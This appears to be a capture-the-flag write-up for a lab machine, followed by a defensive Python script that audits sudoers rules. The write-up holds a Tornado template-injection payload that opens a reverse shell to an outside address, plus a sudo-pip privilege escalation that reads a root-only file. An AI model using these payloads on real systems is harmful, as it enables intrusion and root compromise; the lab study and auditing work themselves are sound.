| Port | Service | Notes |
|---|---|---|
| 22/tcp | SSH | |
| 80/tcp | HTTP | |
| 2222/tcp | Custom TCP server | Vulnerable to a buffer overflow; crashes with an input of at least 2000 A's |
| 9090/tcp | HTTP | Hidden directory leaked via the buffer overflow on 2222, then SSTI in the Tornado web server |
Our SSTI payload (sent in the `hackme` parameter of the hidden directory on port 9090):

```
view-source:http://10.10.19.234:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={% import socket,subprocess,os,pty %}{% from time import sleep %}{{ sleep(5) }}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) }}{{ s.connect(("10.13.14.1",32000)) }}{{ os.dup2(s.fileno(),0) }}{{ os.dup2(s.fileno(),1) }}{{ os.dup2(s.fileno(),2) }}{{ pty.spawn("/bin/bash") }}
```
Reading material on SSTI in Tornado: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python
We can run pip as root via sudo, so privesc is easy: `pip install` executes the package's `setup.py`, and here that runs as root:

```console
zeldris@ubuntu:~$ TF=$(mktemp -d)
zeldris@ubuntu:~$ echo 'raise Exception(open("/root/root.txt").read())' > $TF/setup.py
zeldris@ubuntu:~$ sudo pip install $TF
The directory '/home/zeldris/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/zeldris/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing /tmp/tmp.Z7wkPfZA7J
    Complete output from command python setup.py egg_info:
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/pip-r7iZXg-build/setup.py", line 1, in <module>
        raise Exception(open("/root/root.txt").read())
    Exception: THN{F4KE_PIP_PACKAGE_INSTALL}
```
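The root cause here is a sudo rule that lets an unprivileged user run pip as root. As an added example (not part of the original writeup), the following audit script parses sudoers-style rules and flags any rule granting root execution of binaries that run arbitrary code as a normal side effect, pip included; the sudoers sample and the list of flagged binaries are constructed for the demo.

```python
"""Flag sudo rules that grant root execution of code-running binaries.
Constructed audit helper; the sudoers sample below is made up."""
import os
import re
import shlex

# Binaries whose ordinary use executes caller-supplied code (pip runs a
# package's setup.py), so a root sudo rule for them equals a root shell.
# Hypothetical starting list; extend it for your own environment.
CODE_EXECUTING_BINARIES = {"pip", "pip2", "pip3", "python", "python2",
                           "python3", "perl", "ruby", "gem", "npm"}

# "who hosts=(runas) [TAG:] cmd, cmd ..." on one line (no line continuations).
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rule(line):
    """Return (who, runas_user, [commands]) for a user/group rule, else None."""
    line = line.split("#", 1)[0].strip()          # drop comments
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    rest = re.sub(r"\b[A-Z_]+:\s*", "", m.group("rest"))   # strip NOPASSWD: etc.
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
    return m.group("who"), runas, commands


def find_risky_rules(sudoers_text):
    """Return (who, command, reason) for every rule that yields root code execution."""
    findings = []
    for line in sudoers_text.splitlines():
        parsed = parse_rule(line)
        if not parsed or parsed[1] not in ("root", "ALL"):
            continue                                # only rules that run as root matter
        who, _, commands = parsed
        for cmd in commands:
            if cmd == "ALL":
                findings.append((who, cmd, "unrestricted root"))
                continue
            if cmd.startswith("!"):                 # negated command, not a grant
                continue
            binary = os.path.basename(shlex.split(cmd)[0])
            if binary in CODE_EXECUTING_BINARIES:
                findings.append((who, cmd, f"{binary} executes arbitrary code as root"))
    return findings


SAMPLE_SUDOERS = """# constructed sample, not a real host's file
Defaults env_reset
root ALL=(ALL:ALL) ALL
zeldris ALL=(ALL) NOPASSWD: /usr/bin/pip
alice ALL=(www-data) /usr/bin/python3
bob ALL=(root) /usr/bin/ls, /usr/bin/cat /var/log/syslog
"""

if __name__ == "__main__":
    for who, cmd, reason in find_risky_rules(SAMPLE_SUDOERS):
        print(f"{who}: {cmd} -> {reason}")
```

On a live host, feed it `sudo -l -l` output or `/etc/sudoers` plus `/etc/sudoers.d/*` and fix findings by removing the rule or wrapping the task in a fixed-argument script.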